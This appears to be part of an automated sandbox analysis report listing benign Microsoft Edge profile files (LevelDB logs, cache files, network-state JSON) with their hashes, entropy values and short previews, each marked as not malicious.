                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L865EQ+q2P923oH+Tcwt7Uh2ghZIFUt8OL865EgZmw+OL865EQVkwO923oH+Tcz:7A3v4YebIhHh2FUt8OAa/+OAm5LYebIT
                                                                                                                                                                                                                                                                                              MD5:B0978C9F3F108BBFA59AE288AB20C02E
                                                                                                                                                                                                                                                                                              SHA1:1C9B174D61C73FDFE8EC4F383B9B9DE3BFFCE139
                                                                                                                                                                                                                                                                                              SHA-256:11490964E0BA0F63AD15E65455FE7CC63EC93CA1E5CF09EDF675D300B228F8B8
                                                                                                                                                                                                                                                                                              SHA-512:22175750F3C51FD292D0F7E33BE3F7508C4D98E5570F7C5E6745BF88F8A036132CABB5F93976768353941321C4AEACA82D0E4DA1325EA86139669C34B70D1E23
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.140 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/10-12:40:19.140 1d08 Recovering log #3.2024/12/10-12:40:19.140 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):352
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.06846550240484
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L865EQ+q2P923oH+Tcwt7Uh2ghZIFUt8OL865EgZmw+OL865EQVkwO923oH+Tcz:7A3v4YebIhHh2FUt8OAa/+OAm5LYebIT
                                                                                                                                                                                                                                                                                              MD5:B0978C9F3F108BBFA59AE288AB20C02E
                                                                                                                                                                                                                                                                                              SHA1:1C9B174D61C73FDFE8EC4F383B9B9DE3BFFCE139
                                                                                                                                                                                                                                                                                              SHA-256:11490964E0BA0F63AD15E65455FE7CC63EC93CA1E5CF09EDF675D300B228F8B8
                                                                                                                                                                                                                                                                                              SHA-512:22175750F3C51FD292D0F7E33BE3F7508C4D98E5570F7C5E6745BF88F8A036132CABB5F93976768353941321C4AEACA82D0E4DA1325EA86139669C34B70D1E23
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.140 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/10-12:40:19.140 1d08 Recovering log #3.2024/12/10-12:40:19.140 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):434
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.157623930668104
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:7nOv4YebvqBQFUt8OpX/+OV5LYebvqBvJ:7M4YebvZg8OprHLYebvk
                                                                                                                                                                                                                                                                                              MD5:B282E77CCCEBAD73AD3934C371C57102
                                                                                                                                                                                                                                                                                              SHA1:BB4E7BA8EC56CA3C9599E42CEC8351BEF50ECA6A
                                                                                                                                                                                                                                                                                              SHA-256:13728326B94262A0B11106276B8F1C160384763224FD4189EB7156A684ED7D11
                                                                                                                                                                                                                                                                                              SHA-512:8E2089CD94349D55227B9390F96F12DEE67C55260912C269A79512FF45ADF1CE28C8C23BF06319CF29E01A46F6CB4A4E6AB29792D263B6A1EA464099C8188E04
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.558 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:40:20.602 1e20 Recovering log #3.2024/12/10-12:40:20.608 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):434
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.157623930668104
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:7nOv4YebvqBQFUt8OpX/+OV5LYebvqBvJ:7M4YebvZg8OprHLYebvk
                                                                                                                                                                                                                                                                                              MD5:B282E77CCCEBAD73AD3934C371C57102
                                                                                                                                                                                                                                                                                              SHA1:BB4E7BA8EC56CA3C9599E42CEC8351BEF50ECA6A
                                                                                                                                                                                                                                                                                              SHA-256:13728326B94262A0B11106276B8F1C160384763224FD4189EB7156A684ED7D11
                                                                                                                                                                                                                                                                                              SHA-512:8E2089CD94349D55227B9390F96F12DEE67C55260912C269A79512FF45ADF1CE28C8C23BF06319CF29E01A46F6CB4A4E6AB29792D263B6A1EA464099C8188E04
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.558 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:40:20.602 1e20 Recovering log #3.2024/12/10-12:40:20.608 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\6b118e70-ed16-4b3b-b5ab-bae71220da02.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\7708c758-74d6-4ab2-a6b3-c6066b2eb348.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):144
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                              MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                              SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                              SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                              SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF38f70.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                              MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                              SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                              SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                              SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\b80fd1a4-6d4b-459a-b3cf-f25bb5a2e82e.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\f725d917-332f-46f9-b8e1-450b2d846063.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):144
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                              MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                              SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                              SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                              SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):80
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                              MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                              SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                              SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                              SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):422
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1768589194879135
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:7v/Uzv4YebvqBZFUt8OvrZ/+OvX5LYebvqBaJ:73o4Yebvyg8OBxLYebvL
                                                                                                                                                                                                                                                                                              MD5:B7A919359ACB2C6BF9CDC2975E13015E
                                                                                                                                                                                                                                                                                              SHA1:1643AFA8050FBDCAD03768B1C090680E4DAB7023
                                                                                                                                                                                                                                                                                              SHA-256:985BCEB95C8ED6F0E2F85D6BA6CF4014FA8C4A73A4099B98321409DDE3C770CF
                                                                                                                                                                                                                                                                                              SHA-512:B363A34718B42A24616ABE2220DABA696E501467A1A887F852A8CE1E0351ED48B994C2B191687B530DB08C7043063D2C7A9DDA2914A5A7BE2F2497DC7196E1CF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:37.820 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/10-12:40:37.831 1e20 Recovering log #3.2024/12/10-12:40:37.840 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):422
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1768589194879135
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:7v/Uzv4YebvqBZFUt8OvrZ/+OvX5LYebvqBaJ:73o4Yebvyg8OBxLYebvL
                                                                                                                                                                                                                                                                                              MD5:B7A919359ACB2C6BF9CDC2975E13015E
                                                                                                                                                                                                                                                                                              SHA1:1643AFA8050FBDCAD03768B1C090680E4DAB7023
                                                                                                                                                                                                                                                                                              SHA-256:985BCEB95C8ED6F0E2F85D6BA6CF4014FA8C4A73A4099B98321409DDE3C770CF
                                                                                                                                                                                                                                                                                              SHA-512:B363A34718B42A24616ABE2220DABA696E501467A1A887F852A8CE1E0351ED48B994C2B191687B530DB08C7043063D2C7A9DDA2914A5A7BE2F2497DC7196E1CF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:37.820 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/10-12:40:37.831 1e20 Recovering log #3.2024/12/10-12:40:37.840 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1574698967407056
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L86VXk3+q2P923oH+TcwtpIFUt8OL86WrZmw+OL86EtVkwO923oH+Tcwta/WLJ:7AKv4YebmFUt8OAvr/+OAP5LYebaUJ
                                                                                                                                                                                                                                                                                              MD5:3CB259D27A59A56886D24DA6E37CDD44
                                                                                                                                                                                                                                                                                              SHA1:45AC996A60EA57F9590D59D9E8E41A2138C3B9A8
                                                                                                                                                                                                                                                                                              SHA-256:46B6F08557BAB6873E69D282F70BA6CA3C0C51BEC7FCCE915EB848EBC48968E3
